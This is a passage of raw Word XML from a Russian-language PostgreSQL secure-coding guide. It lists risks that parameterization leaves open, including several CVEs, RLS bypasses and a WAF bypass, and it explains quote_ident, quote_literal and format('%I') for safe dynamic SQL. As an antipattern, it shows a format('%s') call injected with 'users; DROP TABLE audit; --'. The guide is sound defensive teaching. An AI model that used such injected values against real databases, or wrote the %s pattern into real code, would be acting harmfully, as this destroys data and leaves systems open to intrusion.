        <w:t xml:space="preserve">cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = неудачная stacked-query попытка от extended-режима).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — приёмы для bulk-параметров (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">unnest($1::int[])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и для безопасного построения dynamic SQL через helper-библиотеки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg.sql.SQL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pgx.Identifier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pg-format</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Что не закрывает параметризация даже идеально применённая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R5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dollar-quoted strings — не payload в данных, а синтаксический бypass WAF. Параметризация не релевантна.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R6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2025-1094 — баг в самих escape-функциях libpq при invalid UTF-8. Параметризация через extended protocol защищает, но client-side escape (psql wrapper) — нет. См. 3.9.7.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R10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2024-10977 — libpq MITM до handshake. Параметризация на этом этапе ещё не задействована.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R13 / R14 / R27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — memory-class CVE в C-коде сервера, независимы от способа подачи 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R8 / R9 / R11 / R26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RLS-обходы на уровне сервера, не зависят от того, как клиент отправил запрос.</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R7 / R16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — privilege escalation через расширения; параметризация не влияет на CREATE FUNCTION / CREATE EXTENSION.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметризация — необходимое условие защиты, не достаточное.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 quote_ident, quote_literal, format('%I')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметризация (5.1) защищает значения, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не защищает identifier-ы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — имена таблиц, колонок, схем, ролей. Если пользователь контролирует, в какую таблицу идёт запрос или какую колонку фильтровать, нужны другие приёмы. Главные три инструмента в PostgreSQL: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format('%I', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и whitelist на стороне приложения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда identifier нельзя параметризовать</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-грамматика разделяет identifier-ы и literal-ы на уровне парсера. Параметризация работает только для literal-ов. Эти конструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не принимают</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> параметризацию:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM $1                          -- ERROR: syntax error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT $1 FROM users                      -- $1 трактуется как value, не как column</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY $1                               -- $1 = literal, не имя колонки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GROUP BY $1                               -- то же</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE $1 ADD COLUMN ...             -- DDL вообще не принимает params</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path = $1                      -- SET-команды parsed как-то иначе</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT ... ON $1 TO ...                    -- identifier-context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Везде, где нужно подставить имя — нужен другой механизм.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I') — корректное цитирование identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 встроенная функция (с PG 9.1), которая делает type-aware escaping для разных контекстов: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 identifier (двойные кавычки + escape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как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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — literal (одинарные кавычки + escape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внутри как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 raw string (НИЧЕГО не делает — опасно для user input)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Правильный паттерн:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- В plpgsql-функции или динамическом SQL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM %I WHERE id = $1', table_name) USING user_id;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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гарантирует, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">table_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> будет корректно процитировано — даже если содержит точку, пробел, UTF-8 символы, reserved word. Невалидный identifier (например, с NUL-byte) вызовет ошибку до выполнения, что предпочтительнее тихого undefined behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контр-пример (антипаттерн):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ❌ %s не защищает — даёт identifier injection (см. 3.16.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM %s WHERE id = $1', table_name) USING user_id;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- table_name = "users; DROP TABLE audit; --" → DROP TABLE проходит</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">quote_ident() — стандартная функция цитирования</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 альтернатива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возвращает строку, готовую для встраивания в SQL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM ' || quote_ident(table_name) || ' WHERE id = $1' USING user_id;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Поведение идентичное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 обоснован один и тот же codepath.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синтаксически чище, но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нужен в местах, где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неудобно (например, при построении длинных динамических SQL по частям). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Никогда не используйте `quote_ident()` для значений</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для значений есть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quote_literal() — для значений, когда параметризация недоступна</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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процитирует значение в одиночные кавычки и сделает escape внутренних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В контексте, где параметры через USING недоступны (например, COPY)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'COPY ' || quote_ident(table_name) || ' FROM ' || quote_literal(file_path);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сценарии, где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применим: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COPY команды (не принимают параметры в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</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TO</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Динамические SET-команды в PL/pgSQL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Построение строк для подачи в driver, который не поддерживает extended protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В остальных случаях параметризация (5.1) — лучше.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 всё ещё уязвим к encoding-конфликт-атакам (R6, CVE-2025-1094) на client-side при использовании в psql-обёртках.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная таблица: что использовать в каком контексте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Контекст</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Корректный инструмент</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Антипаттерн</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Значение в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE col = X</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Параметризация (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$1</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:name</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WHERE col =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Имя таблицы / колонки в SQL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 name)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или whitelist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FROM ' \</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Имя в DDL (CREATE/ALTER/DROP)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 name)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или whitelist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конкатенация</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Значение в COPY/SET (no params)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quote_literal(value)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конкатенация</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ORDER BY column_name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Whitelist (см. 3.14.2)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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> тоже работает, но whitelist строже</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Имя схемы (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">schema.table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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format('%I.%I', schema, table)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format('%I')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для конкатенированного </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">schema.table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — НЕВЕРНО</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Edge case: schema-qualified identifier</w:t>
      </w:r>
    </w:p>
